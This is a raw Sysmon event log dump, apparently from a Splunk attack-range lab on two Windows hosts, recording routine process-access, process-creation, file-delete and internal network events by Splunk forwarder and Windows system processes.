10:44:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.633{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1004-6216-DF04-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.633{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1004-6216-DF04-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.634{C8EA50B7-1004-6216-DF04-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.605{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0A1DE0046C4AAD2CD7B1105B371F22,SHA256=1FA55CFBA33C0C55645A7529A43784285C20894EBAB47DCA77986316A5C75CBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.605{C8EA50B7-1004-6216-DE04-000000003802}41283904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.026{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1004-6216-DE04-000000003802}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.007{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.007{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.007{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.007{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.007{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1004-6216-DE04-000000003802}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.007{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1004-6216-DE04-000000003802}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.005{C8EA50B7-1004-6216-DE04-000000003802}4128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.617{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC74CD908C4A921F031314E952C5B39,SHA256=75CC5307F61AB8B237D3C212D8EF84AA87807DEEEA00758D0ADDA118D4F90C78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:21.010{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3572FD2504B0BAD27A22CF59B136B4C,SHA256=3F971A6CCBFC0527C304A8671FC14985DF8B8ECA5FC9E6C092B9F32A80ECC990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.523{C8EA50B7-F2AD-6215-BB00-000000003802}4488ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V010000A.logMD5=196C8210B4CCCD9046D7F21D345A8E5B,SHA256=10642183AD961C0976A49CE27B48417083278B7ADE1496EF6FCA351EED8AD666,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.507{C8EA50B7-F2AD-6215-BB00-000000003802}4488ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V0100009.logMD5=09EF7AD15CB458F3416D7E2F81821101,SHA256=F1EF38B2B5600DBBA255E229CBF3640B834B06F6DD47ECCB12B82DE0299A70D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.132{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1005-6216-E004-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.132{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1005-6216-E004-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.132{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1005-6216-E004-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:21.133{C8EA50B7-1005-6216-E004-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:22.648{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD7ED6CC9629662EF26EFBCBBB6EEBF6,SHA256=F94E0D1A79125F25EF6B1C81A70EB3AD340C17684738B96F5183FE15F0F098FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:18.527{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51263-false10.0.1.12-8000- 23542300x8000000000000000215519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:22.089{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD97988F4D5333A42CF7247C530B610,SHA256=CA240F6AE2D00266CFE120C625E4F7F58E2056159D5502BFDDFD27D8A37EC799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:23.710{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D793416150785C311115AA25FA00AA53,SHA256=182E286E1B78A015877C1BBAD573A0576CD475DE548190C7CA9B8E60771B3B8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:23.135{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=139CD7D3016A78B85BC7B566BB108BF4,SHA256=2902CEEE2EDCB391B404DC48D1FB8235204165C1C9D192BF8C98D80EF46986A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.622{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53347-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:24.757{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=577301A2ACF8805B32D9C886919BBFA8,SHA256=109587D2F261362DDFDCEBB67E34283F7D182C7A3C6E43B997E2BB540EE40DC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:24.150{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=350944A76C90FB7E3C1BE693CDE53CB5,SHA256=9BFC631BC62202579CCA2989F5B5114654C8FA90351B902E6C69875AF9F31B58,IMPHASH=00000000000000000000000000000000falsetrue 